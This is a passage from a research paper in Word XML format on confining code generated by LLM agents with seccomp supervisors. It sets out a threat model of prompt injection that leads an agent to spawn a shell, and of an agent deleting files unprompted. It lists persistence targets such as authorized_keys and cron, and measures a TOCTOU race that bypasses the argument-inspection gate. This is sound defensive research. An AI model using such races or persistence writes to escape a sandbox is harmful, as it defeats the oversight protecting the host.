        <w:t xml:space="preserve">not touch it (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:memmut">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), and a host-owned cgroup kill switch drives the process tree to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">zero live processes where PID enumeration races (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:killswitch">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sections </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:discussion">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">–</w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:related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give the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implication for a threat model, the limits of the study, and the position against prior work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="the-control-fails"/>
      <w:r>
        <w:t xml:space="preserve">The control fails</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="sec:threat"/>
      <w:r>
        <w:t xml:space="preserve">Threat model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The host runs code produced by an LLM agent and treats that code as untrusted. Two sources</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">drive dangerous behaviour, and the design goal is to contain both at one boundary. The first</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">attacker injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a prompt-injection payload steers the agent into emitting a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dangerous call, for example</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/sh")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">routed through the generated code. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">second is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">autonomous malfunction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: with no attacker, the agent reaches for a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">destructive shortcut on its own, for example deleting a build directory it was asked to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reset.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The defender controls the seccomp filter and the supervisor process; the supervisor obtains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">read access to the target’s memory through the parent–child relationship (equivalently</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SYS_PTRACE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in a hardened deployment). The attacker controls the contents of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">untrusted process—its threads, the timing of its calls, and the arguments in its own</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">address space—but not the supervisor or the kernel. This is the standard capability split</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for a syscall supervisor, and it is exactly the split under which the allow-path race in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou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is available: the attacker owns the memory the supervisor reads and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the kernel later re-reads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="sec:method"/>
      <w:r>
        <w:t xml:space="preserve">Method</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="mechanical-oracle."/>
      <w:r>
        <w:t xml:space="preserve">Mechanical oracle.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generated C is compiled with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and executed under</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">timeout 10 unshare -rn strace -f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The footprint of a run is the set of security-relevant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">syscalls it issues (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execve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openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unlink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 and their families), read from the trace. A baseline of one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—the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">process launch—is subtracted before a run counts as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attempting.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">No claim in this paper is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">derived by scanning model output for keywords.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="subjects."/>
      <w:r>
        <w:t xml:space="preserve">Subjects.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three local code models generate the artifacts:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qwen2.5-coder:1.5b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deepseek-coder:6.7b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, served through Ollama. The host is a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">single x86_64 machine. Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:limi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states what this scope does and does not support.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="where-the-code-runs."/>
      <w:r>
        <w:t xml:space="preserve">Where the code runs.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unshare -rn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">supplies a user and network namespace—no route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">off the host, which is how we assert the zero-egress results—but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a mount namespace, so the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">filesystem the artifact sees is the host’s. Destructive behaviour is therefore contained by the syscall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">boundary and a scratch directory, not by filesystem isolation. Injection artifacts are safe to run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">outright: the injected payload is a benign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append into a fixture under</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/agentsec_run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so what we observe is the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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mechanism, not a destructive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">effect. Autonomous destruction artifacts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rm -rf build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, direct</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unlink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) are run behind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the deny gate—a seccomp filter that blocks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,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unlink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unlinkat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—from a throwaway working directory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/tmp/agentsec_auto/sandbox_cwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); the destructive call returns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EPERM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and nothing is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deleted, so we record the attempt without executing it. Fixtures are recreated per run and removed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">after.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="the-gate."/>
      <w:r>
        <w:t xml:space="preserve">The gate.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The rootful gate forks the target, installs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SCMP_ACT_NOTIFY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execveat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(and, in persistence mode, on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and their variants), and sends the notification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">descriptor to the supervisor. On each notification the supervisor reads the pathname from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/pid/mem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, compares it against policy, and either allows the call by returning</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SECCOMP_USER_NOTIF_FLAG_CONTINUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or denies it with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EPERM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The rootless gate,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by contrast, is a blanket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SCMP_ACT_ERRNO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deny of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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execveat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/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with no argument inspection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="statistics."/>
      <w:r>
        <w:t xml:space="preserve">Statistics.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For a stochastic quantity—an agent’s rate of emitting a dangerous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">call—we report a Wilson 95% score interval, written as a bracketed percentage pair after the rate.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Small-</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>N</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rates in Part III carry wide intervals and we print them rather than let a bare percentage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">imply precision the sample does not have. The gate’s decision is not a stochastic rate and receives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no failure-rate interval; its determinism is a property to be stated, and its soundness is measured</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">separately as coverage (Sections </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">–</w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:selectivity">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Every Part I figure below is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reproducible from committed source through</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">experiments/agentsec/reproduce.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which rebuilds the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">binaries and re-checks the headline results (9 checks, all passing at the time of writing); the Part II–IV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">benchmarks reproduce through their own scripts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">landlock_bench.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which also runs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the Landlock scope,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">io_uring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, composed-sandbox, and memory-mutation probes, plus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">enum_tree.py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concealment_capture.py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matrix_analysis.py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telemetry_probe.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="sec:toctou"/>
      <w:r>
        <w:t xml:space="preserve">The argument-inspection gate is bypassable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The gate blocks the direct attack completely. A target that writes to a path containing a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">persistence token—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys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/.ssh/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—is denied on every</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">one of 4000 attempts, and the supervisor’s own counter agrees with the target’s: 4000 calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seen, 4000 denied. Head-on, the argument inspection does exactly what it claims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The allow path does not survive a race. On a permitted call the supervisor validates the pathname it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">read from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/pid/mem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, then returns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SECCOMP_USER_NOTIF_FLAG_CONTINUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">instructs the kernel to resume the syscall. Resuming the syscall means the kernel copies the pathname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pointer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">again</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, at execution time. Between the supervisor’s read and the kernel’s re-read the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">target’s other threads keep running—only the calling thread is parked on the notification—so a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sibling thread that flips the buffer from a benign path to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in that window</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">causes the supervisor to validate one path and the kernel to open another.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We measured the effect with a two-thread target: one thread issues the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a second</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flips the shared path buffer. Across 4000 attempts the evil path was opened despite the gate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">between 18.9% and 23.1% across five independent rebuilds (19.2% on the first);</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the remainder split</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">between benign opens and correct denials, and the three outcomes account for every trial. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">existence of the bypass is a property of the mechanism and is host-independent; the per-attempt rate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">depends on scheduler behaviour and moved between runs, so we do not treat it as a fixed figure. Under</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">retry the distinction stops mattering: at a per-attempt success near one in five, a persistence write</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">succeeds with probability above 0.9 within roughly eleven attempts, and the agent is free to retry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the documented deep-argument hazard of seccomp user notification, and neither the hazard nor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">its exploitation is new. Garfinkel’s survey of system-call interposition tools names argument races as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">one of the recurring practical failures of the technique </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and Watson demonstrated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">working concurrency attacks against deployed syscall wrappers </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; both predate seccomp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">user notification and describe the same defect at the same place. The kernel’s own header is blunter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">than the manual page the mechanism is usually read from:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">linux/seccomp.h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">states that the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flag carries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an inherent TOCTOU,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”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an attacker can exploit the time while</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the supervised process is waiting on a response,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it should be absolutely clear that this</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
